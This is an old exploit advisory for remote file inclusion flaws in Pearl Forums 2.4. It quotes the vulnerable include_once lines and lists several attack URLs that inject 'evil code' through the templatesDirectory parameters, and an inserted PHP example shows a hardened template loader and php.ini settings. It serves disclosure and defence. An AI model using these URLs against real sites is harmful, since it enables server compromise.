Nov 22, 2006 - 12:00 a.m.

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

2006-11-22 00:00:00
vulners.com


/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main Script Of Pearl Products
//Affected Version:2.4
//Download script: http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

Bugs in addressbook.php, admin.php, merge.php and more files than you would expect.
Many files are vulnerable, so check all of them, as with the other vulnerable Pearl scripts.

--------------------------------------------------------------------------------\\


Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");


Exploits:

Note that further variables are not sanitized either; the exploits below work
when register_globals=on.

http://[target]/[path]/includes/admin.php?templatesDirectory=evil code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evil code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evil code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evil code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evil code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evil code
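The include pattern quoted under "Vul Codes", and why the URLs above reach it, shown beside a hardened form. This is an added example, not Pearl Forums code; the $GlobalSettings and templatesDirectory names come from the advisory, while load_template(), the allowlist and the paths are assumptions.

```php
<?php
// Added example (not Pearl Forums code). $GlobalSettings / templatesDirectory are the
// names from the advisory; load_template(), the allowlist and paths are hypothetical.

// --- Vulnerable pattern, as quoted in the advisory ---
// With register_globals=on, a request such as ?GlobalSettings[templatesDirectory]=<value>
// populates the array before this line runs, so include_once() loads whatever path or
// URL the request supplied (allow_url_include permitting).
//   include_once("$GlobalSettings[templatesDirectory]/addressbook.php");

// --- Hardened form ---
// 1. Configuration is assigned unconditionally in code, so request data can never be the
//    source of $GlobalSettings, whether register_globals is on or off.
$GlobalSettings = array(
    'templatesDirectory' => __DIR__ . '/templates/default',
);

// 2. Only known template names are accepted, and the caller's input never forms the path
//    directly; the file name is built from an allowlisted token.
function load_template(array $settings, $name)
{
    $allowed = array('addressbook', 'admin', 'merge', 'poll');
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('unknown template');
    }
    $base = realpath($settings['templatesDirectory']);
    $file = realpath($base . '/' . $name . '.php');
    // realpath() resolves symlinks and '..'; the prefix check rejects anything that ends up
    // outside $base. A remote URL never resolves to a local path, so it fails here as well.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template outside templates directory');
    }
    include_once $file;
}

// 3. Defence in depth: php.ini settings that close the channel the advisory relies on.
//      register_globals = Off
//      allow_url_include = Off
//      allow_url_fopen = Off   (if the application does not need remote streams)
if (ini_get('register_globals')) {
    error_log('register_globals is enabled; request data can overwrite $GlobalSettings');
}
```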

   Many more bugs can be discovered; just download the script.

-----------------------------------------------------------------------------------
   Thx To: str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
   Special Gr33Ts: ASIANEAGLE & Kacper & The Master

////////////////////////////////////////////////////////////////////////////////////